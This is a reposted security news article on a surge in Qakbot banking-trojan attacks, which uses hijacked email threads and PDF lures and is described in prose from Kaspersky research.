[ad_1]
Researchers are seeing a “significant increase” in attacks deploying the Qakbot malware, which have targeted victims in Germany, Argentina, Italy, Algeria, Spain, the U.S. and other countries with emails containing PDF attachments that deliver the banking trojan.
Qakbot, which was first detected in 2007, has since grown into a multi-purpose malware with multiple functionalities, including tools for performing reconnaissance, exfiltrating data and delivering other payloads. Its modular nature gives it flexibility for keeping up with the evolving threat landscape, and the malware has recently seen growing popularity among a variety of threat groups that either use its various capabilities or any of its second-stage payloads.
Attackers deploying the malware have previously relied on hijacked email threads (harvested in bulk from Microsoft ProxyLogon), as detailed last year by Cisco Talos researchers; this more recent spate of infections relies on a similar method, said researchers with Kaspersky on Monday. Researchers said at least 4,500 spam emails have been sent in this wave of attacks, which they first observed April 4.
“The malware would be delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French,” said Victoria Vlasova, Andrey Kovtun and Darya Ivanova, researchers with Kaspersky, in a Monday report. “The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.”
Attackers are using simulations of business emails they were able to access in order to lure users to open the PDF; while the legitimate senders’ names populate the “From” field, in actuality the email address comes from a fraudulent account. These emails have a variety of business-related purposes. In some emails, for instance, attackers asked targets to provide all the documentation pertaining to an attached “application,” or to calculate the contract value based on attached “cost estimates.”
“The QBot malware delivery scheme begins with an e-mail letter with a PDF file in the attachment being sent,” said researchers. “The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert advising the user to click Open to view the attached files. If the user complies, an archive will be downloaded from a remote server (compromised site), protected with a password given in the original PDF file.”
The PDF eventually leads to a downloaded archive containing a Windows Script File, which in turn executes a PowerShell script. This script uses wget to download a DLL file from a remote server, which eventually delivers Qakbot.
“We have analyzed the Qbot samples from the current e-mail campaign. The bot’s configuration block features company name ‘obama249’ and time stamp ‘1680763529’ (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers,” said researchers. “Most of these addresses belong to those users, whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.”
The banking trojan has received various module modifications over time to improve its effectiveness, and its distribution methods have also evolved from compromised websites in its early days to now include phishing and spam attacks. However, researchers said that the malware’s functionality has remained mostly unchanged over the past few years.
“As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system,” said researchers. “Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.”
[ad_2]
Source link